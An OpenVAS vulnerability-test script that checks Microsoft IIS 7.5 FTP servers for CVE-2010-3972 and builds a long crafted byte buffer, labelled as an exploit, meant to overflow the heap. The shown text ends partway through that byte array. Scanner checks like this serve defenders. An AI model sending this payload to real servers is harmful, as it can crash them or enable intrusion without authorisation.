ID OPENVAS:801669
Type openvas
Reporter Copyright (C) 2010 Greenbone Networks GmbH
Modified 2017-02-17T00:00:00
Description
This host is running Microsoft IIS with FTP server and is prone to
Denial of service vulnerability.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_ms_iis_ftpd_dos_vuln.nasl 5323 2017-02-17 08:49:23Z teissa $
#
# Microsoft Windows IIS FTP Server DOS Vulnerability
#
# Authors:
# Sooraj KS <kssooraj@secpod.com>
#
# Updated By : Sooraj KS <kssooraj@secpod.com> on 2011-04-12
# Updated to detect vulnerable patterns.
#
# Copyright:
# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
tag_impact = "Successful exploitation may allow remote attackers to execute arbitrary code
on the system or cause the application to crash.
Impact Level: Application";
tag_affected = "Windows 7 IIS 7.5 FTP Server";
tag_insight = "The flaw is due to a boundary error when encoding Telnet IAC
characters in a FTP response. This can be exploited without authenticating
to the FTP service to cause a heap-based buffer overflow by sending an overly
long, specially crafted FTP request.";
tag_solution = "Run Windows Update and update the listed hotfixes or download and
update mentioned hotfixes in the advisory from the below link,
http://www.microsoft.com/technet/security/bulletin/ms11-004.mspx";
tag_summary = "This host is running Microsoft IIS with FTP server and is prone to
Denial of service vulnerability.";
if(description)
{
script_id(801669);
script_version("$Revision: 5323 $");
script_tag(name:"last_modification", value:"$Date: 2017-02-17 09:49:23 +0100 (Fri, 17 Feb 2017) $");
script_tag(name:"creation_date", value:"2010-12-27 09:55:05 +0100 (Mon, 27 Dec 2010)");
script_cve_id("CVE-2010-3972");
script_bugtraq_id(45542);
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_name("Microsoft Windows IIS FTP Server DOS Vulnerability");
script_xref(name : "URL" , value : "http://secunia.com/advisories/42713");
script_xref(name : "URL" , value : "http://www.kb.cert.org/vuls/id/842372");
script_xref(name : "URL" , value : "http://www.exploit-db.com/exploits/15803/");
script_xref(name : "URL" , value : "http://www.securitytracker.com/id?1024921");
script_xref(name : "URL" , value : "http://www.vupen.com/english/advisories/2010/3305");
script_tag(name:"qod_type", value:"remote_vul");
script_category(ACT_DENIAL);
script_copyright("Copyright (C) 2010 Greenbone Networks GmbH");
script_family("Denial of Service");
script_dependencies("find_service.nasl");
script_require_ports("Services/ftp", 21);
script_tag(name : "impact" , value : tag_impact);
script_tag(name : "affected" , value : tag_affected);
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
exit(0);
}
include("ftp_func.inc");
## Get FTP Port
ftpPort = get_kb_item("Services/ftp");
if(!ftpPort){
ftpPort = 21;
}
## Get Port Status
if(!get_port_state(ftpPort)){
exit(0);
}
## Confirm Application
banner = get_ftp_banner(port:ftpPort);
if("Microsoft FTP Service" >!< banner){
exit(0);
}
## Build Exploit
attack = raw_string(
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0,
0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83,
0xb0, 0xef, 0x83, 0xb0, 0xef, 0x83, 0xb0, 0xef,
0x83, 0xb0, 0x31, 0x34, 0x34, 0x39, 0x38, 0xef,
0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,
0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe,
0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff,
0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf,
0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xff,
0xef, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,
0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef,
0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,
0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef,
0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,
0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe,
0xff, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf,
0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,
0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,
0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,
0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
0xbf, 0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xff,
0xef, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xfe,
0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef,
0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xef,
0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,
0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe,
0xff, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xfe,
0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,
0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,
0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,
0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,
